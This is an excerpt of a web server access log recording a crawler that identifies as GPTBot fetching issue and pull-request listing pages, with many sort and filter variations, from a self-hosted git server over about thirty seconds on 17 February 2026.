"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:18:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:43:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10095] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:43:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:43:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:43:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:43:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:43:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:43:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:43:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:18:43:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:43:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr 